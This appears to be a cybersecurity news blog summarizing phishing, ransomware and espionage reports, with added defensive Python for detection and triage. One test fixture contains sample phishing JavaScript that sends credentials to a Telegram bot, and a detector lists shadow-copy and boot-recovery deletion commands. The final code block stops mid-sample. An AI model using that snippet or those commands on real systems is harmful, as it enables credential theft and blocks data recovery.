Posts with label: Cyber Threats

New Two-Step Phishing Attack Exploits Microsoft Visio and SharePoint

 

A novel two-step phishing technique that abuses Microsoft Visio files (.vsdx) and SharePoint signals a new trend in cyber deception, according to experts. Researchers at Perception Point have noted a significant rise in attacks that use .vsdx files, a format that was previously uncommon in phishing.

These files act as delivery tools, directing victims to phishing pages that replicate Microsoft 365 login portals, aiming to steal user credentials.

The two-step phishing attacks employ layered techniques to evade detection. Rather than delivering harmful content directly, these campaigns use trusted platforms like Microsoft SharePoint to host files that appear legitimate. Attackers embed URLs within Visio files, which redirect victims to malicious websites when clicked, bypassing traditional email security systems.

Microsoft Visio, a popular tool for professional diagram creation, has now become a phishing vector. Cybercriminals send emails with Visio files from compromised accounts, often mimicking urgent business communications such as proposals or purchase orders. This tactic encourages recipients to act quickly, increasing the likelihood of success.

Since the emails come from stolen accounts, they often pass authentication checks and evade recipient security filters. In some cases, attackers include .eml files within the emails, embedding additional malicious URLs linked to SharePoint-hosted files.

The Visio files typically contain a clickable button labeled "View Document." Victims are instructed to hold the Ctrl key while clicking the button, which is Visio's normal way of following a hyperlink in an open drawing, so the instruction looks routine to the user. Because the link is only followed on that manual gesture, automated sandboxes and URL scanners that do not reproduce it never reach the malicious URL.

Perception Point advises organizations to strengthen their defenses against sophisticated phishing campaigns by adopting advanced threat detection solutions. Suggested measures include:

  • Dynamic URL analysis to identify harmful links.
  • Object detection models to flag suspicious files.
  • Enhanced authentication mechanisms to reduce the impact of compromised accounts.
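
Dynamic URL analysis can only scan a link it has first found, and a Visio lure keeps its link inside an OPC zip package rather than in the email body. The following Python script is an added example, not code from Perception Point or from this page: it opens a .vsdx, pulls every external target out of the package's relationship parts and every Address cell out of the shapes' Hyperlink sections, and returns the list to hand to URL analysis. The sample package it builds is constructed for the demo, and the example.invalid URL in it is a placeholder.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# A .vsdx is an Open Packaging Conventions zip: XML parts plus *.rels relationship parts.
PKG_RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
VISIO_NS = "http://schemas.microsoft.com/office/visio/2012/main"
RELATIONSHIP = f"{{{PKG_RELS_NS}}}Relationship"
CELL = f"{{{VISIO_NS}}}Cell"


def extract_vsdx_urls(data):
    """Return [(part_name, url), ...] for every external link in a .vsdx package.

    Two places are checked, because a hyperlink may be recorded in either:
      1. *.rels parts: <Relationship Target="..." TargetMode="External"/>
      2. page XML: <Cell N="Address" V="..."/> in a shape's Hyperlink section,
         which is where a "View Document" style button keeps its target.
    """
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            lname = name.lower()
            if not lname.endswith((".rels", ".xml")):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                continue  # a part that will not parse deserves its own alert in a real pipeline
            if lname.endswith(".rels"):
                for rel in root.iter(RELATIONSHIP):
                    if rel.get("TargetMode", "").lower() == "external" and rel.get("Target"):
                        hits.append((name, rel.get("Target")))
            else:
                for cell in root.iter(CELL):
                    if cell.get("N") == "Address" and cell.get("V"):
                        hits.append((name, cell.get("V")))
    return hits


def unique_urls(data):
    """The de-duplicated URL list to feed into URL analysis or a sandbox."""
    seen, out = set(), []
    for _, url in extract_vsdx_urls(data):
        if url not in seen:
            seen.add(url)
            out.append(url)
    return out


def build_sample_vsdx():
    """Constructed stand-in for a lure file (not a real sample): one page whose only
    shape is a hyperlinked button, plus that page's relationship part."""
    page_xml = (
        f'<PageContents xmlns="{VISIO_NS}"><Shapes><Shape ID="1" Type="Shape">'
        '<Section N="Hyperlink"><Row N="Row_1">'
        '<Cell N="Address" V="https://example.invalid/shared/view-document"/>'
        '<Cell N="Description" V="View Document"/>'
        '</Row></Section></Shape></Shapes></PageContents>'
    )
    rels_xml = (
        f'<Relationships xmlns="{PKG_RELS_NS}">'
        '<Relationship Id="rId1" TargetMode="External" '
        'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" '
        'Target="https://example.invalid/shared/view-document"/>'
        '<Relationship Id="rId2" Target="../masters/masters.xml" '
        'Type="http://schemas.microsoft.com/visio/2010/relationships/masters"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("visio/pages/page1.xml", page_xml)
        zf.writestr("visio/pages/_rels/page1.xml.rels", rels_xml)
    return buf.getvalue()


if __name__ == "__main__":
    for part, url in extract_vsdx_urls(build_sample_vsdx()):
        print(f"{part}: {url}")
```

The script deliberately does not judge the URLs itself: the whole point of the campaign is that the first hop is a legitimate SharePoint-hosted file, so an allowlist on the host would wave the lure through. Extraction feeds the dynamic URL analysis the page recommends; that is where the redirect chain gets followed.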

Understanding the Threat of Fake Hacking: How to Stay Protected


In the dynamic and high-stakes field of cybersecurity, the word “hacking” often evokes thoughts of complex cyberattacks and data breaches. However, a lesser-known but equally concerning issue is the emergence of “fake hacking,” where individuals or groups falsely claim to have infiltrated computer systems.

Fake hacking occurs when attackers pretend to breach a network or device without actually doing so. While these actions may not always cause long-term technical damage, they can lead to serious consequences such as extortion and reputational harm. “Fake hacking is particularly insidious because it leverages people’s fear and uncertainty about cybersecurity,” explains William Petherbridge, Manager of Systems Engineering at the cybersecurity firm Fortinet. “Attackers are essentially tricking victims into believing their systems have been compromised in order to extract money or other concessions.”

A common tool used in fake hacking is the “hacker typer,” a website that mimics the look of a system being hacked, displaying lines of code scrolling rapidly across the screen. Other deceptive tactics include emails falsely claiming ransomware infections or pop-ups warning of non-existent malware.

“The goal of the fake hacker is to create a sense of panic and urgency in order to pressure the victim into paying a ‘ransom’ or purchasing some kind of ‘protection’ service,” says Petherbridge. “And unfortunately, if the target isn’t vigilant, they can fall for these tricks quite easily.”

To differentiate between legitimate and fake hacking threats, Petherbridge highlights key warning signs:

  • Money Demands: Requests for relatively small amounts of money, often in cryptocurrency, are a strong indication of fake hacking.
  • Unchanged Systems: Genuine breaches usually involve noticeable changes, such as altered files, new accounts, or unusual network activity. If everything appears normal, the hack is likely fabricated.
  • Disorganized Communication: Fake hackers often lack the sophistication of genuine attackers, with poorly structured emails, inconsistent demands, and an absence of technical details.

To combat fake hacking, Petherbridge advises verifying any claims before taking action and consulting cybersecurity professionals, including former hackers, who can identify fabricated threats. Employee training to recognize these red flags is also crucial.

“The most important step is to never panic or rush into a decision when faced with a purported hacking incident,” Petherbridge emphasizes. “Take the time to carefully assess the situation, double-check the facts, and respond accordingly. Falling for a fake hack can be just as damaging as a real one.”

The rise of fake hacking highlights the complexity and evolving nature of cybersecurity. While these attacks lack the technical sophistication of genuine breaches, they can cause significant harm through financial loss, reputational damage, and eroded trust.

By recognizing the signs of fake hacking and implementing strong security protocols, individuals and organizations can safeguard themselves from these deceptive threats. Vigilance, education, and a calm, calculated response remain the best defenses.

Group-IB Unveils Sophisticated Phishing Campaign Targeting Global Organizations

 


A recent report by Group-IB has exposed a highly advanced phishing campaign targeting employees from 30 companies across 15 jurisdictions. Using trusted domains and cutting-edge personalization techniques, attackers have bypassed Secure Email Gateways (SEGs) and exploited victims in critical sectors such as finance, government, aerospace, and energy.

Advanced Obfuscation and Multi-Layered Deception

The investigation, initiated in July 2024, uncovered the attackers' use of:

  • Over 200 phishing links hosted on legitimate platforms like Adobe’s InDesign cloud service and Google AMP.
  • Techniques to bypass detection systems that typically block suspicious or unknown domains.

“Nine out of ten cyberattacks start with a phishing email, making it the most common entry point for threat actors,” the report emphasized.

Phishing Emails That Mimic Trusted Brands

The attackers used professionally designed phishing emails that impersonated well-known brands, including:

  • DocuSign, prompting victims to sign fake contracts.
  • Adobe-hosted links, disguising fraudulent login pages as critical documents.

These emails featured professional formatting, familiar logos, and dynamically personalized elements. For example, by extracting a victim’s email domain, the attackers matched logos and page titles to the targeted organization, enhancing credibility.

“Scammers use a technique that dynamically pulls company logos from the official website to make the phishing links look legitimate,” the report noted.

Exploitation of APIs for Realistic Branding

The attackers leveraged APIs like https://logo.clearbit.com/[company domain] to integrate authentic logos into phishing sites. This seamless branding approach increased user trust and made phishing attempts harder to detect.

Concealing Operations with URL Redirection and Encoding

To evade detection, attackers used:

  • URL redirections via Google AMP to create complex trails.
  • Encoded parameters to obscure the attack path.

Victims were redirected to phishing pages that appeared legitimate, with pre-filled email addresses further enhancing the illusion of authenticity. Once users entered their credentials, the stolen data was sent to Command-and-Control (C2) servers or Telegram bots via API endpoints.

Advanced Data Exfiltration Techniques

The phishing sites contained JavaScript that shipped the stolen credentials Base64-encoded. Base64 is an encoding, not encryption; it does nothing against an analyst who decodes it, but it keeps the credentials from standing out in proxy logs or a quick look at the traffic. Group-IB analysts observed: “The JSON response from Telegram’s API confirms that the stolen credentials were successfully sent to a private chat controlled by the attacker.”
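
The branding and exfiltration indicators described above (a logo lookup keyed on the victim's domain, a Base64-carried pre-filled address, and a Telegram Bot API drop) can be pulled out of a captured page mechanically. This Python triage script is an added example, not Group-IB's code; the HTML, landing URL and bot token it scans are constructed for the demo, and the token shape the Telegram regex assumes ("<bot id>:<secret>") is an assumption rather than a documented format.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlparse

# Indicators the campaign used. The logo API host is the one named in the report;
# the Telegram token shape and the secret's character set are assumptions.
LOGO_API_RE = re.compile(r"https?://logo\.clearbit\.com/[^\s\"'<>)]+", re.I)
TELEGRAM_RE = re.compile(
    r"https?://api\.telegram\.org/bot(\d+:[A-Za-z0-9_-]+)/(?:sendMessage|sendDocument)", re.I)
B64_RUN_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")  # long enough to skip most identifiers


def decode_b64_strings(text):
    """Return (encoded, decoded) pairs for Base64 runs that decode to printable UTF-8.
    Base64 is an encoding, not encryption: anything it hides from a glance is
    recoverable like this, including the credentials a kit ships to its drop."""
    out = []
    for m in B64_RUN_RE.finditer(text):
        blob = m.group(0)
        try:
            raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
            decoded = raw.decode("utf-8")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue  # random identifier that happened to look like Base64
        if decoded.isprintable():
            out.append((blob, decoded))
    return out


def triage_phishing_page(html, landing_url):
    """Pull the branding, pre-fill and exfiltration indicators out of a captured page."""
    report = {
        "logo_lookups": sorted(set(LOGO_API_RE.findall(html))),
        "telegram_bots": sorted({m.group(1) for m in TELEGRAM_RE.finditer(html)}),
        "prefilled_from_url": [],
        "decoded_strings": [d for _, d in decode_b64_strings(html)],
    }
    # An encoded query parameter that decodes to an address is how the form gets pre-filled.
    for key, values in parse_qs(urlparse(landing_url).query).items():
        for value in values:
            for _, decoded in decode_b64_strings(value):
                if "@" in decoded:
                    report["prefilled_from_url"].append((key, decoded))
    return report


# Constructed page and landing URL standing in for a captured kit (not real samples).
SAMPLE_HTML = """<img src="https://logo.clearbit.com/example.com" alt="logo">
<script>
  var victim = atob("dXNlckBleGFtcGxlLmNvbQ==");
  document.getElementById("email").value = victim;
  function send(pw) {
    fetch("https://api.telegram.org/bot123456789:AAEassumedTokenValue_for-demo/sendMessage", {
      method: "POST",
      body: JSON.stringify({chat_id: "1111", text: btoa(victim + ":" + pw)})
    });
  }
</script>"""
SAMPLE_URL = "https://example.invalid/doc/view?e=dXNlckBleGFtcGxlLmNvbQ=="

if __name__ == "__main__":
    for field, value in triage_phishing_page(SAMPLE_HTML, SAMPLE_URL).items():
        print(f"{field}: {value}")
```

The bot token is the most useful artifact the script surfaces: with it, the drop channel can be reported to Telegram, and it doubles as a pivot for clustering other pages from the same kit.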

Ongoing Evolution in Phishing Tactics

Group-IB warns that these techniques signify a continuous evolution in phishing methodologies: “Threat actors are quickly adapting, constantly refining and improving their techniques to bypass security measures and exploit vulnerabilities.”

Conclusion: A Growing Need for Vigilance

This campaign serves as a stark reminder of the ever-evolving nature of cyber threats. Organizations must strengthen their defenses and educate employees to identify and respond to increasingly sophisticated phishing attempts.

South Korea’s Rising Influence in Global Cybersecurity

 


South Korea’s Expanding Role in Global Cybersecurity

South Korea is emerging as a pivotal player in the global cybersecurity landscape, particularly against the backdrop of escalating tensions between the United States and China in cyberspace. By participating in high-profile cybersecurity exercises and fostering international collaborations, the country is bolstering its reputation as a key ally in both regional and global cyber defense initiatives.

Recently, South Korea hosted the APEX cyberwarfare exercise, which gathered cybersecurity experts and defense personnel from over 20 nations. This exercise simulated cyberattacks on critical infrastructure, enabling participants to devise defensive strategies and exchange vital insights. South Korea has also actively participated in NATO-led events, such as the Locked Shields exercise, which focuses on testing and enhancing cyber resilience.

In addition, South Korea showcased its commitment to international cybersecurity efforts by attending the Cyber Champions Summit in Sydney. The country is set to host the next iteration of the summit, emphasizing its dedication to fostering global cooperation in addressing cyber threats.

Strategic Alliances and Emerging Trends

South Korea's advanced technological capabilities and strategic location have positioned it as a vital partner for the United States in addressing cyber threats, especially those originating from China. According to analysts, South Korea’s infrastructure serves as a communications hub for critical trans-Pacific submarine cables connecting major networks across Asia, including China. Experts have also suggested that the country may act as a base for US cyber operations, similar to its role in hosting the THAAD missile system in 2017.

China, meanwhile, has been enhancing its cyber capabilities in response to growing alliances among its rivals. In April 2024, China reorganized its People’s Liberation Army to include specialized units dedicated to cyber, information, and space operations. Despite these efforts, experts note that China’s cyber capabilities still lag behind those of the US and its allies.

South Korea’s increasing involvement in cybersecurity underscores its strategic importance in addressing modern cyber challenges. By collaborating with the US, NATO, and other allies, the nation is strengthening its cyber defenses while contributing to a broader security framework in the Indo-Pacific region. These initiatives are poised to shape the global cybersecurity landscape in the coming years.

T-Mobile System Intrusion Tied to Chinese Cyber Threat

 


T-Mobile has confirmed that it is the latest telecommunications company affected by a long-running, large-scale cyber-espionage campaign waged against telecom providers by state-sponsored hackers in China.

There has been some confusion as to whether the breach involved customer data or critical systems; T-Mobile maintains that there has been no significant impact on either. The intrusion is part of a larger campaign against major telecom providers, which raises questions about the security of critical communications infrastructure around the world.

The FBI and CISA are investigating the campaign, in which Chinese-linked threat actors compromised U.S. telecommunications networks, stole call records and accessed the private communications of government officials and political figures.

U.S. intelligence agencies confirmed that the actors had reached the private communications of a "limited number" of government officials after compromising several U.S. broadband providers. The actors also copied certain information that was subject to U.S. law-enforcement requests made under court orders.

Separately, ESET's APT Activity Report covering April to September 2024 describes a MirrorFace intrusion that used the World Expo scheduled for Osaka, Japan, in 2025 as its lure. Despite that new geographic target, MirrorFace continues to concentrate on Japan and Japan-related events. MirrorFace (also tracked as Earth Kasha) is one of the clusters grouped under the APT10 umbrella, alongside Earth Tengshe and Bronze Starlight.

Active since at least 2018, the group has focused on Japanese organizations; a campaign observed in early 2023 extended its operations to Taiwan and India, though Japan remains its main target. Over that time its toolset has grown from a handful of backdoors, namely ANEL (a.k.a. Uppercut), LODEINFO and NOOPDOOR (a.k.a. HiddenFace), into a broader arsenal that pairs those backdoors with credential stealers such as MirrorStealer.

T-Mobile's security practice has drawn heavy criticism after a string of data breaches in recent years. Earlier in 2024 the company settled with the FCC for $31.5 million over those earlier breaches, with half of that sum earmarked for improvements to its security infrastructure. The repeated breaches at T-Mobile, which is majority-owned by Deutsche Telekom, have been one of the most difficult aspects of the company's recent history.

In August 2021 T-Mobile said about 49 million account holders were affected by a breach, although the attackers claimed to have stolen data on 100 million users. In the present case the company says it is actively monitoring the situation and working closely with government officials on the investigation, and that it has no evidence so far that customer privacy, security or service has been affected.

In its statement, T-Mobile said it is closely monitoring this industry-wide attack; that, thanks to its security controls, network structure and diligent monitoring and response, it has seen no significant impact on its systems or data; that it has found no evidence of access to or exfiltration of customer or other sensitive information, as other companies may have experienced; and that it will continue to monitor the situation and work with industry peers and the relevant authorities. The incident comes as the company is expanding its cybersecurity practice, partly under the FCC settlement described above.

The T-Mobile breach is a prime example of the unique challenges facing the telecommunications sector, which is classified as critical infrastructure under federal law. As upstream providers of information and communications, telecommunications companies underpin healthcare, government and the private sector, enabling everything from emergency services to business transactions to personal connectivity.

These networks are therefore prime targets for state-sponsored campaigns that exploit their role in carrying sensitive communications. The shift in cyber-espionage tactics over the past few years is disturbing: actors such as Salt Typhoon go after the lawful-intercept (wiretap) systems and other sensitive channels inside carrier networks to steal data and undermine systems vital to national security.

In an analysis published on November 19, 2024, Trend Micro reported that MirrorFace gained initial access through vulnerabilities in victims' public-facing enterprise products, namely Array AG, Proself (CVE-2023-45727) and FortiOS/FortiProxy. "After gaining access, they installed several backdoors within the victim's network to achieve persistence," said security researcher Hara Hiroaki. Those backdoors included Cobalt Strike, LODEINFO and NOOPDOOR, the last of which was discovered last year.

NOOPDOOR, a sophisticated implant, is decrypted and launched by a shellcode loader named NOOPLDR. It has built-in functions and modules for uploading and downloading files, running additional programs, and communicating with an attacker-controlled server in either an active or a passive mode. As Hiroaki noted, the active and passive modes use different encryption algorithms and different sets of backdoor commands, so the two channels are entirely independent of one another.

Ransomware Gangs Actively Recruiting Pen Testers: Insights from Cato Networks' Q3 2024 Report

 

Cybercriminals are increasingly recruiting penetration testers into ransomware affiliate programs such as Apos, Lynx and Rabbit Hole, according to Cato Networks' Q3 2024 SASE Threat Report, published by its Cyber Threats Research Lab (CTRL).

The report highlights numerous Russian-language job advertisements uncovered by monitoring discussions on the Russian Anonymous Marketplace (RAMP). Speaking at an event in Stuttgart, Germany, on November 12, Etay Maor, Chief Security Strategist at Cato Networks, explained: "Penetration testing is a term from the security side of things when we try to reach our own systems to see if there are any holes. Now, ransomware gangs are hiring people with the same level of expertise - not to secure systems, but to target systems."

He further noted, "There's a whole economy in the criminal underground just behind this area of ransomware."

The report details how ransomware operators aim to ensure the effectiveness of their attacks by recruiting skilled developers and testers. Maor emphasized the evolution of ransomware-as-a-service (RaaS), stating, "[Ransomware-as-a-service] is constantly evolving. I think they're going into much more details than before, especially in some of their recruitment."

Cato Networks' team found ransomware tooling for sale, including locker source code priced at $45,000. Maor remarked: "The bar keeps going down in terms of how much it takes to be a criminal. In the past, cybercriminals may have needed to know how to program. Then in the early 2000s, you could buy viruses. Now you don't need to even buy them because [other cybercriminals] will do this for you."

AI's role in facilitating cybercrime was also noted as a factor lowering barriers to entry. The report flagged examples like a user under the name ‘eloncrypto’ offering a MAKOP ransomware builder, an offshoot of PHOBOS ransomware.

The report warns of the growing threat posed by Shadow AI—where organizations or employees use AI tools without proper governance. Of the AI applications monitored, Bodygram, Craiyon, Otter.ai, Writesonic, and Character.AI were among those flagged for security risks, primarily data privacy concerns.

Cato CTRL also identified critical gaps in Transport Layer Security (TLS) inspection. Only 45% of surveyed organizations utilized TLS inspection, and just 3% inspected all relevant sessions. This lapse allows attackers to leverage encrypted TLS traffic to evade detection.

In Q3 2024, Cato CTRL noted that 60% of the CVE exploit attempts it blocked travelled inside TLS traffic. Prominent targets included vulnerabilities in Log4j, SolarWinds and ConnectWise products.

The report is based on the analysis of 1.46 trillion network flows across over 2,500 global customers between July and September 2024. It underscores the evolving tactics of ransomware gangs and the growing challenges organizations face in safeguarding their systems.

New SMTP Cracking Tool for 2024 Sold on Dark Web Sparks Email Security Alarm

 

A new SMTP (Simple Mail Transfer Protocol) server cracking tool, advertised as updated for 2024, has surfaced for sale on the dark web, raising significant concerns about email security and data privacy.

The tool is marketed as bypassing protective measures to gain unauthorized access to mail servers. Such access puts personal, business and government communications at risk.

The availability of this tool showcases the growing sophistication of cybercriminals and their ability to exploit weaknesses in email defenses. Unauthorized access to SMTP servers not only exposes private correspondence but also facilitates phishing, spam campaigns, and cyber-espionage.

Experts caution that widespread use of this method could result in increased phishing attacks, credential theft, and malware distribution. "Organizations and individuals must prioritize strengthening email security protocols, implementing strong authentication, and closely monitoring for unusual server activity," they advise.

Mitigating these risks requires consistent updates to security patches, enforcing multi-factor authentication, and using email encryption. The emergence of this dark web listing highlights the ongoing threats cybercriminals pose to critical communication systems.
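
The advice to monitor for unusual server activity is concrete enough to implement. The Python below is an added example, not anything from the dark-web listing or from the experts quoted; it assumes the tool works the way most so-called SMTP crackers do, by guessing credentials over SMTP AUTH, and it assumes Postfix's SASL failure log format. The log excerpt is constructed, using documentation-range addresses.

```python
import re
from collections import defaultdict
from datetime import datetime

# Postfix smtpd logs a failed SMTP AUTH attempt like this (syslog prefix first):
#   Nov  5 10:00:01 mx1 postfix/smtpd[2211]: warning: unknown[203.0.113.5]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
# The regex assumes that format; other MTAs need their own pattern.
SASL_FAIL_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ postfix/smtpd\[\d+\]: "
    r"warning: (?P<rdns>\S+)\[(?P<ip>[0-9a-fA-F.:]+)\]: SASL (?P<mech>\w+) authentication failed"
)


def parse_sasl_failures(lines):
    """Yield (syslog_timestamp, client_ip, mechanism) for each failed AUTH line."""
    for line in lines:
        m = SASL_FAIL_RE.match(line)
        if m:
            yield m.group("ts"), m.group("ip"), m.group("mech")


def find_bruteforce_sources(lines, threshold=5, window_seconds=60):
    """Return {ip: peak failures inside any window_seconds span} for clients that
    reach `threshold`. A user mistyping a password once or twice stays under it;
    a cracker cycling through a wordlist does not."""
    by_ip = defaultdict(list)
    for ts, ip, _ in parse_sasl_failures(lines):
        # syslog timestamps carry no year; strptime fills in 1900, fine for differences
        by_ip[ip].append(datetime.strptime(ts, "%b %d %H:%M:%S"))
    hits = {}
    for ip, stamps in by_ip.items():
        stamps.sort()
        start, peak = 0, 0
        for end, t in enumerate(stamps):       # sliding window over sorted timestamps
            while (t - stamps[start]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            hits[ip] = peak
    return hits


# Constructed log excerpt (documentation-range addresses, not real clients).
SAMPLE_LOG = """\
Nov  5 10:00:01 mx1 postfix/smtpd[2211]: warning: unknown[203.0.113.5]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
Nov  5 10:00:02 mx1 postfix/smtpd[2211]: warning: unknown[203.0.113.5]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
Nov  5 10:00:02 mx1 postfix/smtpd[2213]: warning: unknown[203.0.113.5]: SASL PLAIN authentication failed: authentication failure
Nov  5 10:00:03 mx1 postfix/smtpd[2211]: warning: unknown[203.0.113.5]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
Nov  5 10:00:04 mx1 postfix/smtpd[2214]: warning: unknown[203.0.113.5]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
Nov  5 10:00:05 mx1 postfix/smtpd[2211]: warning: unknown[203.0.113.5]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
Nov  5 10:02:10 mx1 postfix/smtpd[2220]: warning: laptop.example.net[198.51.100.7]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
Nov  5 10:02:14 mx1 postfix/smtpd[2220]: client=laptop.example.net[198.51.100.7], sasl_method=LOGIN, sasl_username=alice
""".splitlines()

if __name__ == "__main__":
    for ip, n in find_bruteforce_sources(SAMPLE_LOG).items():
        print(f"{ip}: {n} failed AUTH attempts within 60s, block or rate-limit")
```

The window matters more than the raw count: a cracker that spreads its guesses across many source addresses will stay under the per-IP threshold, so the same logic should also be run per target username, where a spray shows up as many sources against one account.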

As attackers continue to innovate, the cybersecurity community emphasizes vigilance and proactive defense strategies to safeguard sensitive information. This development underscores the urgent need for robust email security measures in the face of evolving cyber threats.

2024’s Most Dangerous Malware: A Wake-Up Call for Cybersecurity

 

OpenText, a leader in cybersecurity insights, has released its eagerly awaited “Nastiest Malware of 2024” list, highlighting some of the most destructive and adaptive cyber threats of the year. The list illustrates how ransomware and other malicious software continue to evolve, particularly regarding their impact on critical infrastructure. As cybercriminals refine their tactics, the need to strengthen cybersecurity measures has become increasingly urgent. Organizations around the globe are projected to boost their cybersecurity spending by 14.3% in 2024, raising total investments to over $215 billion, which reflects the magnitude of the challenges posed by these threats. 

LockBit claimed the title of the most dangerous malware of the year. This ransomware-as-a-service (RaaS) entity has demonstrated its ability to evade law enforcement efforts, including those from the FBI. Its ongoing attacks on critical infrastructure showcase its resilience and technical prowess. According to the FBI, LockBit was responsible for 175 reported attacks on essential systems in 2023 alone. The group’s bold ambition to target one million businesses emphasizes its threat level and solidifies its position in the ransomware landscape. 

Akira, a relatively new player, has rapidly gained infamy for its aggressive tactics. This ransomware has been particularly active in industries such as healthcare, manufacturing, and finance, using advanced encryption methods to cause significant disruption. Its retro-inspired branding contrasts sharply with its destructive potential, making it a popular choice among cybercriminal affiliates. 

Meanwhile, RansomHub, which may have connections to the infamous Black Cat (ALPHV) group, has made headlines with its high-profile attacks, including a daring strike on Planned Parenthood that compromised sensitive patient data. 

Other significant threats include Dark Angels, recognized for precision-targeted attacks on Fortune 50 companies, and Play Ransomware, which exploits vulnerabilities in FortiOS systems and exposed RDP servers. Redline Stealer is not ransomware, but it endangers organizations just as seriously by stealing credentials and sensitive information. Each of these threats illustrates how cybercriminals keep pushing the limits, employing advanced tactics to stay ahead of defenses. 

Muhi Majzoub, OpenText’s EVP and Chief Product Officer, notes that the increase in ransomware targeting critical infrastructure highlights the growing risks to national security and public safety. At the same time, the heightened emphasis on cybersecurity investments is a positive indication that organizations are recognizing these threats. However, the ability of ransomware groups to adapt remains a significant worry, as these criminals continue to leverage new technologies, including artificial intelligence, to create more sophisticated attacks. 

The findings from this year reveal a harsh truth: while progress in cybersecurity is being made, the rapid pace of innovation in malware development poses an ongoing challenge. As companies enhance their vigilance and dedicate more resources to protect vital systems, the battle against cyber threats is far from finished. The changing nature of these attacks requires ongoing adaptation, collaboration, and investment to protect the essential services that support modern society.

SafePay Ransomware: A New Threat with Advanced Techniques

 

In October 2024, cybersecurity experts at Huntress identified a previously undocumented ransomware strain named SafePay. This malware was deployed in two separate incidents and stands out for its distinctive features, including the use of .safepay as an encrypted file extension and a ransom note titled readme_safepay.txt. Despite its limited exposure, SafePay’s techniques signal a skilled operator leveraging advanced ransomware methods.

SafePay is linked to older ransomware families like LockBit, with Huntress analysts stating: “During our analysis of the ransomware binary, we began to notice a large number of similarities to the extensively analyzed LockBit samples from the end of 2022.” These parallels suggest that SafePay’s developers may have utilized leaked LockBit source code to create their malware, showcasing a blend of stealth and sophistication.

SafePay follows a systematic two-phase attack process:

  • Data Collection and Exfiltration: In one observed incident, attackers used WinRAR to archive data across multiple systems and exfiltrated it via FileZilla. Analysts remarked, “This activity looks like potential data exfiltration from the network—collected and archived with WinRAR and then possibly exfiltrated out using FTP.” Tools were uninstalled post-use to erase traces.
  • Encryption Deployment: Using Remote Desktop Protocol (RDP) access, attackers deployed ransomware scripts via PowerShell, targeting network shares. Commands such as disabling shadow copies and modifying boot configurations were executed to impede recovery. The ransom note ominously begins with: “Greetings! Your corporate network was attacked by SafePay team,” and outlines negotiation steps for data recovery.

The SafePay group operates on both the Tor network and the decentralized The Open Network (TON). Its leak site showcases victim organizations and directories of stolen data. Huntress analysts found the site's backend misconfigured: an Apache server-status endpoint was left exposed, offering insights into the group's operations.
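
The two phases above map onto process-creation telemetry in a way that is worth encoding. The Python below is an added example, not Huntress's code: it runs three rules over a constructed event stream, namely archive-then-transfer staging on one host, a PowerShell script launched against a UNC share, and the standard recovery-inhibition commands. The exact command forms for shadow-copy deletion and boot-configuration changes (vssadmin, wmic, bcdedit, wbadmin) are assumed; the page only says those settings were changed. Hostnames, user names, paths and timestamps are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Standard recovery-inhibition commands (ATT&CK T1490). The page says SafePay disabled
# shadow copies and changed boot configuration; that it used exactly these command
# forms is an assumption for the demo.
RECOVERY_INHIBIT_RULES = [
    ("vssadmin.exe", re.compile(r"delete\s+shadows", re.I)),
    ("wmic.exe", re.compile(r"shadowcopy\s+delete", re.I)),
    ("bcdedit.exe", re.compile(r"recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures", re.I)),
    ("wbadmin.exe", re.compile(r"delete\s+catalog", re.I)),
]
ARCHIVERS = {"winrar.exe", "rar.exe"}
TRANSFER_TOOLS = {"filezilla.exe"}
UNC_PATH = re.compile(r"\\\\[\w.-]+\\")   # \\host\share...


def parse_events(lines):
    """Constructed process-creation format: 'YYYY-mm-dd HH:MM:SS|host|user|image|cmdline'."""
    events = []
    for line in lines:
        ts, host, user, image, cmdline = line.split("|", 4)
        events.append({"ts": datetime.fromisoformat(ts), "host": host, "user": user,
                       "image": image.lower().rsplit("\\", 1)[-1], "cmdline": cmdline})
    return events


def detect_safepay_ttps(lines, exfil_window=timedelta(minutes=30)):
    """Return (rule, host, detail) alerts for the behaviours described above:
    archive-then-transfer staging, a PowerShell script run against a network
    share, and recovery inhibition. Events must be in time order."""
    alerts = []
    archive_runs = defaultdict(list)            # host -> timestamps of archiver runs
    for ev in parse_events(lines):
        image, cmd, host = ev["image"], ev["cmdline"], ev["host"]
        for rule_image, pattern in RECOVERY_INHIBIT_RULES:
            if image == rule_image and pattern.search(cmd):
                alerts.append(("inhibit_recovery", host, cmd))
        if image == "powershell.exe" and UNC_PATH.search(cmd) and ".ps1" in cmd.lower():
            alerts.append(("powershell_script_on_share", host, cmd))
        if image in ARCHIVERS:
            archive_runs[host].append(ev["ts"])
        if image in TRANSFER_TOOLS:
            recent = [t for t in archive_runs[host] if ev["ts"] - t <= exfil_window]
            if recent:  # archiver ran on this host shortly before the transfer tool
                alerts.append(("archive_then_transfer", host,
                               f"{len(recent)} archive run(s) within {exfil_window} before {image}"))
    return alerts


# Constructed telemetry: one server showing the full chain, one workstation extracting an archive.
SAMPLE_EVENTS = r"""2024-10-12 02:01:10|SRV-FS01|corp\jdoe|C:\Program Files\WinRAR\WinRAR.exe|WinRAR.exe a -r -ep1 C:\Temp\fs01.rar \\SRV-FS01\Finance
2024-10-12 02:14:55|SRV-FS01|corp\jdoe|C:\Program Files\FileZilla FTP Client\filezilla.exe|filezilla.exe
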